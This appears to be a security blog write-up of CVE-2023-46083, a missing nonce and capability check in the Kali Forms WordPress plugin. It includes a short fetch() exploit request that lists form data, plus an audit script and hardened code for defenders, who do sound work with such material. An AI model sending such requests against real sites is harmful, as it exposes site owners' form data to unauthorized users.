Kali Forms, a popular and easy-to-use contact form builder plugin for WordPress websites, has been found to have a critical security vulnerability, tracked as CVE-2023-46083. The vulnerability, which affects Kali Forms versions up to 2.3.27, involves missing authorization checks in the plugin's access control, potentially exposing sensitive information and control of forms to unauthorized users.
In this article, we explore the details of this vulnerability, provide code snippets showing how it can be exploited, and link to original references for further reading. We also suggest how such vulnerabilities can be prevented in the future.
Description of the Vulnerability
The vulnerability in question stems from missing authorization checks within the Kali Forms plugin, specifically when handling the Ajax requests for contact form data. The plugin's code does not properly validate whether users have the necessary permissions to access, modify, or delete form data. As a result, even users without appropriate access permissions can potentially exploit the plugin to obtain sensitive information or alter form contents.
To demonstrate this vulnerability in action, let's take a look at a code snippet from Kali Forms version 2.2.1:
// In file: includes/ajax-endpoints.php
add_action('wp_ajax_kaliforms_forms', function () {
    // Neither a nonce nor a capability is verified before the form list is returned
    $forms_repository = new FormRepository(Database::instance());
    echo json_encode(['list' => $forms_repository->get_forms()]);
});
Here, the plugin's code adds an action to handle Ajax requests for the "kaliforms_forms" action. There are two main issues with this code:
1. No nonce check is performed to ensure the request originates from a trusted source.
2. No capability check is performed to ensure the user performing the request has the required permissions.
These two issues combined make it possible for a malicious user to send carefully crafted requests to the WordPress site and obtain contact form information, even if they do not have appropriate access rights.
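As an added example, not code from the Kali Forms plugin or its authors, the following script audits a plugin's PHP source for wp_ajax_* registrations and reports which handlers never call a nonce check or a capability check, which is the exact defect described above. The embedded sample source is constructed to resemble the vulnerable pattern beside a hardened handler; the names FormRepository, Database and kaliforms_export_handler in it are placeholders that are never executed, and the brace matcher is deliberately simple (it does not skip braces inside strings or comments, and a check made in a called helper is not seen), so its output is a list of review leads rather than a verdict.

```php
<?php
// Added example (not Kali Forms code): static audit of wp_ajax_* handlers.
// Usage: php audit.php [plugin-file.php]   (no argument: audits the sample below)

/** Return the brace-balanced block starting at the first '{' at or after $pos. */
function extract_block(string $src, int $pos): string
{
    $open = strpos($src, '{', $pos);
    if ($open === false) {
        return '';
    }
    $depth = 0;
    for ($i = $open, $len = strlen($src); $i < $len; $i++) {
        if ($src[$i] === '{') {
            $depth++;
        } elseif ($src[$i] === '}' && --$depth === 0) {
            return substr($src, $open, $i - $open + 1);
        }
    }
    return substr($src, $open); // unbalanced input: return the remainder
}

/** Map each wp_ajax_* hook in $src to the security checks found in its handler body. */
function audit_ajax_handlers(string $src): array
{
    $results = [];
    $re = '/add_action\s*\(\s*[\'"](wp_ajax_[\w-]+)[\'"]\s*,\s*/';
    preg_match_all($re, $src, $m, PREG_OFFSET_CAPTURE);
    foreach ($m[0] as $i => [$whole, $offset]) {
        $hook  = $m[1][$i][0];
        $after = $offset + strlen($whole);   // just past the comma: the callback starts here
        $body  = '';
        if (preg_match('/(?:static\s+)?function\s*\(/A', $src, $x, 0, $after)) {
            $body = extract_block($src, $after);            // closure: body follows inline
        } elseif (preg_match('/[\'"]([A-Za-z_]\w*)[\'"]/A', $src, $x, 0, $after)) {
            $def = '/function\s+' . preg_quote($x[1], '/') . '\s*\(/';
            if (preg_match($def, $src, $d, PREG_OFFSET_CAPTURE)) {
                $body = extract_block($src, $d[0][1]);      // named callback: locate its definition
            }
        }
        $results[$hook] = [
            'nonce_check'      => (bool) preg_match('/\b(?:check_ajax_referer|wp_verify_nonce)\s*\(/', $body),
            'capability_check' => (bool) preg_match('/\bcurrent_user_can\s*\(/', $body),
            'logged_out_hook'  => strncmp($hook, 'wp_ajax_nopriv_', 15) === 0,
        ];
    }
    return $results;
}

// Constructed sample: one handler shaped like the vulnerable snippet, one hardened handler.
$sample = <<<'PHP'
<?php
add_action('wp_ajax_kaliforms_forms', function () {
    $forms_repository = new FormRepository(Database::instance());
    echo json_encode(['list' => $forms_repository->get_forms()]);
});
add_action('wp_ajax_kaliforms_export', 'kaliforms_export_handler');
function kaliforms_export_handler() {
    check_ajax_referer('kaliforms_nonce', '_wpnonce', true);
    if (!current_user_can('manage_options')) {
        wp_send_json_error('Unauthorized user');
    }
    wp_send_json_success(['ok' => true]);
}
PHP;

$src = isset($argv[1]) ? file_get_contents($argv[1]) : $sample;
foreach (audit_ajax_handlers($src) as $hook => $c) {
    $missing = [];
    if (!$c['nonce_check'])      { $missing[] = 'nonce check'; }
    if (!$c['capability_check']) { $missing[] = 'capability check'; }
    $scope = $c['logged_out_hook'] ? 'logged-out' : 'logged-in';
    printf("%-30s (%s) %s\n", $hook, $scope, $missing ? 'MISSING: ' . implode(', ', $missing) : 'ok');
}
```

Run against an installed plugin directory with a shell loop over its PHP files; the "logged-out" marker matters because a wp_ajax_nopriv_ handler with no checks is reachable by anyone, while a wp_ajax_ handler still requires a session.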
Exploit Details
Given the code snippet above, exploiting this vulnerability is quite simple. An attacker could send an Ajax request to the WordPress site, asking for a list of contact forms created with the Kali Forms plugin. Note that the wp_ajax_ hook shown above only fires for logged-in users, so the request needs a session, however low-privileged; fully unauthenticated access would additionally require a matching wp_ajax_nopriv_ registration.
// In file: exploit.js
fetch(ajaxurl, {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: 'action=kaliforms_forms'
})
    .then(response => response.json())
    .then(data => console.log(data));
If successful, this request would return a JSON object whose list entry contains data about all contact forms created using Kali Forms, including sensitive information such as form IDs, names, and field data.
Prevention and Mitigation
In order to prevent such vulnerabilities from occurring, proper access control checks and nonce checks should be implemented in the code. For instance, the vulnerable code in the Kali Forms plugin can be modified to include a nonce check and a capability check like so:
// In file: includes/ajax-endpoints.php
add_action('wp_ajax_kaliforms_forms', function () {
    // Check nonce: dies with a 403 response if the '_wpnonce' field is missing or invalid
    check_ajax_referer('kaliforms_nonce', '_wpnonce', true);
    // Check capabilities: a valid nonce proves intent, not privilege
    if (!current_user_can('manage_options')) {
        wp_send_json_error('Unauthorized user'); // also terminates the request
        return;
    }
    $forms_repository = new FormRepository(Database::instance());
    echo json_encode(['list' => $forms_repository->get_forms()]);
});
By including these additional security checks, Kali Forms would be much less vulnerable to exploitation through unauthorized Ajax requests.
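The fixed snippet verifies a nonce but does not show where that nonce comes from. As an added example, not code from the Kali Forms plugin, here is the complete round trip for an admin-only Ajax endpoint: the nonce is generated server-side and handed to the admin page's script, the script sends it back as the _wpnonce field, and the handler verifies it before checking the capability. The handle example-forms-admin, the action name example_forms_list and the file admin.js are placeholders.

```php
<?php
// Added example (not Kali Forms code): full nonce + capability flow for a wp_ajax_ endpoint.

// 1. Server: enqueue the admin script and hand it the Ajax URL and a nonce tied to the action name.
add_action('admin_enqueue_scripts', function () {
    wp_enqueue_script('example-forms-admin', plugins_url('admin.js', __FILE__), [], '1.0', true);
    wp_localize_script('example-forms-admin', 'exampleForms', [
        'ajaxUrl' => admin_url('admin-ajax.php'),
        'nonce'   => wp_create_nonce('example_forms_list'),
    ]);
});

// 2. Server: register the handler on wp_ajax_ only (logged-in users); no wp_ajax_nopriv_ twin,
//    so logged-out visitors never reach this code at all.
add_action('wp_ajax_example_forms_list', function () {
    // Rejects the request (HTTP 403) when '_wpnonce' is absent, stale, or for another action.
    check_ajax_referer('example_forms_list', '_wpnonce');

    // A nonce proves the request was issued from a page we rendered for this user;
    // it says nothing about what the user may do, so the capability check is still required.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(['message' => 'Insufficient permissions'], 403);
    }

    $forms = []; // placeholder: real code would query the form repository here
    wp_send_json_success(['list' => $forms]);
});

/* 3. Client, admin.js (enqueued above), sends the nonce back with the action:
 *
 * const body = new URLSearchParams({ action: 'example_forms_list', _wpnonce: exampleForms.nonce });
 * fetch(exampleForms.ajaxUrl, { method: 'POST', body, credentials: 'same-origin' })
 *   .then(r => r.json())
 *   .then(data => console.log(data));
 */
```

Using wp_send_json_success and wp_send_json_error instead of a bare echo keeps the response shape consistent ({"success":true,"data":...}) and sets the JSON content type and, on error, the HTTP status, which makes failed authorization visible in web server logs rather than buried in a 200 response.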
References
For more information on this vulnerability and related security issues, refer to the following references:
1. CVE-2023-46083 - Vulnerability details on MITRE.org
2. Kali Forms Changelog - Plugin's changelog, which includes a fix for this issue in version 2.3.28
3. WordPress Codex - Nonces - Documentation on using nonces in WordPress for security purposes
4. WordPress Codex - Roles and Capabilities - Documentation on handling user roles and capabilities in WordPress
In conclusion, this vulnerability in the Kali Forms Contact Form Builder with drag & drop plugin (CVE-2023-46083) can expose sensitive information about website forms to unauthorized users. By implementing proper nonce and capability checks, this vulnerability can be mitigated and the security of the plugin improved.
Timeline
Published on: 01/02/2025 12:15:10 UTC